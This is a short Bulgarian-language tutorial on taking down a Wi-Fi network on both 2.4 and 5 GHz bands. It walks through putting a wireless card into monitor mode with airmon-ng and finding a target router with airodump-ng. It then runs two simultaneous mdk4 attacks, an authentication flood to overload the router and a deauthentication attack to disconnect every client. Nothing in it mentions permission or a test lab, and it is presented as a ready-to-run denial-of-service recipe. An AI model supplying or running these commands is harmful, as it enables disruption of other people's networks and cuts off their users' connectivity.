КАК ДА СЪБОРИШ WI-FI (2.4GHz + 5GHz)
1. ПУСКАМЕ КАРТАТА (Влизаме в „Monitor Mode“)
Първо трябва да кажем на картата да спре да бъде обикновено Wi-Fi и да започне да „слуша“ всичко.

# Проверяваме името на картата (обикновено е wlan0)
iwconfig

# Убиваме процесите, които ни пречат
sudo airmon-ng check kill

# Пускаме Monitor Mode
sudo airmon-ng start wlan0
Сега картата вече се казва wlan0mon.
--------------------------------------------------------------------------------------------------------------------

2. РАЗУЗНАВАНЕ (Търсим мишената)
Трябва ни MAC адресът на рутера и на кой канал работи.

За 2.4 GHz мрежи:

sudo airodump-ng wlan0mon

(Гледаш CH и BSSID на мрежата).

За 5 GHz мрежи:

sudo airodump-ng --band a wlan0mon
--------------------------------------------------------------------------------------------------------------------
3. ПРАВИМ „ЧЕРЕН СПИСЪК“
За да ударим рутера и на двете честоти едновременно, правим един файл:

nano black_list.txt
Вътре пишеш MAC адресите на рутера (единия за 2.4, другия за 5GHz), един под друг. Пример:
98:3F:60:BD:26:CC 
98:3F:60:BD:26:D0 
(Записваш с Ctrl+O, Enter, и излизаш с Ctrl+X).


4. ТОТАЛНАТА АТАКА (Пускаш в два терминала)
За да изчезне рутера напълно, пускаме „клещите“.

Терминал 1 (Претоварваме процесора на рутера):

sudo mdk4 wlan0mon a -a [MAC_на_рутера_2.4]

Терминал 2 (Разкачваме всички клиенти от ефира):

sudo mdk4 wlan0mon d -c [канал1,канал2] -b black_list.txt

Пример за канали: -c 2,36

ЗАЩО ТОВА РАБОТИ?
Комбинираш две атаки. Първата (режим a) залива рутера с фалшиви заявки, докато той "забие". Втората (режим d) бие по клиентите (телефоните) и не им дава да се върнат. Рутерът направо изчезва от списъците на всички!

Внимавай само да не изгориш чипа на Alfa-та, ако я държиш така с часове!